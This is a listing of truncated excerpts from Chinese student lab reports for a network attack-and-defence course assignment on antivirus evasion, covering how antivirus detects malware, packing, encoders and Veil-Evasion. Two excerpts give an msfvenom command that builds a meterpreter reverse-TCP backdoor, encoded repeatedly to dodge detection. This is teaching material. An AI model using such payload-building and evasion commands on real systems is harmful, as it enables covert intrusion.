2018-2019-2 20165205 网络攻防Exp3免杀原理与实践 一.实践内容 1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.1.1正确使用msf编码器 尝试用msf编码器对后门程序进行多次编码,尝试降低被查杀概率 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 55 -b '\x00' LHOST=10.…

20155308 <网络攻防> Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件. 基于行为来检测:通过对恶意代码的观察.研究,有一些行为是恶意代码的共同行为,而且比较特殊.所以当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,则会把它当成恶意软件. 免杀是做什么? 能使病毒木马避免被杀毒软件查杀的技…

2018-2019-2 20165312<网络攻防技术>Exp3 免杀原理与实践 课上知识点总结 1.恶意软件检测机制 基于特征码的检测(需要定期更新病毒库) 启发式恶意软件检测(实时监控,开销较大) 基于行为的恶意软件检测(如API监控) 2.免杀技术综述 改变特征码 加壳(拥有.exe文件) 压缩壳 加密壳 shellcode+encoder 重写重编译(veil-evasion或者手工) 半手工化(主流) 改变行为 通讯方式 尽量使用反弹式连接 使用隧道技术 加密通讯数据(如https)…

20145236<网络攻防> Exp3 免杀原理与实践 一.基础问题回答 1.杀软是如何检测出恶意代码的? 恶意代码有其特有的特征码,杀软将特征码加入检测库中,当检测到一段代码中具有这样的特征码时就可以判断为恶意代码. 为了防止自身特征码被检测,有些恶意代码使用了免杀加壳软件进行加壳,一些流行的加壳软件已经可以检查出来,如果被这样的加壳软件加壳就可能是恶意代码. 判断该代码是否有恶意行为,若有就会判断代码是恶意代码. 2.免杀是做什么的? 通过各种手段免除计算机对恶意代码查杀即为免杀. 3.免…

20155226<网络攻防> Exp3 免杀原理与实践 实验过程 1. msfvenom直接生成meterpreter可执行文件 直接将上周做实验时用msf生成的后门文件放在virscan.org中进行扫描,扫描结果如下: 从上图可以看出,有19/39的杀毒软件发现有病毒,说明该后门程序很容易被发现 2. Msfvenom使用编码器生成meterpreter可执行文件 (1)一次编码: 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/s…

20155318 <网络攻防>Exp3 免杀原理与实践 基础问题 杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件. 基于行为来检测:通过对恶意代码的观察.研究,有一些行为是恶意代码的共同行为,而且比较特殊.所以当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,则会把它当成恶意软件. 免杀是做什么? 避免被杀毒软件或管理员发现并删除的恶意代…

20155321 <网络攻防> Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 根据实验指导书,杀软有两个方法可以检测出恶意代码.第一种是基于特征码,即先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码.第二种是基于行为,即杀软通过检测程序是否有更改注册表行为.是否有设置自启动.是否有修改权限等等行为进行判断,但此方法有一定的错误率,相当于如果你做了别人应该做的事,那我就认为你是别人. 免杀是做什么? 即使用一些技巧避开杀软的检测…

20155330 <网络攻防> Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征码.先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码. 基于行为.杀软通过检测程序是否有更改注册表行为.是否有设置自启动.是否有修改权限等等行为进行判断. 免杀是做什么? 恶意代码避免杀毒软件查杀,从而实现入侵. 免杀的基本方法有哪些? 对恶意代码进行加壳 利用shellcode进行编码 实践过程记录 使用msf生成后门程序的检测 将实验二中…

2015306 白皎 <网络攻防>Exp3 免杀原理与实践 一.实践基础 免杀,故名思义,指的是一种能使病毒木马免于被杀毒软件查杀的技术. 免杀的方法有很多,比如加壳改壳.加垃圾指令.以及修改内存特征码,在本博客后面就是通过把具有特征码的代码顺序互换一下来达到免杀的目的. 二.实践内容 第一项: Msfvenom编码器生成的程序 1.直接利用上次后门实验生成的exe文件进行检测~ 可以明显的看到将近一半的杀软都可以检测出来错误,说明这个木马不行,之后我们会进行改造,尽量使文件不要被查杀出来.…

### 2018-2019-2 网络对抗技术 20165320 Exp3 免杀原理与实践 一.实验内容 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分) 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 二.报告内容 2.1 基础问题问答 杀软是…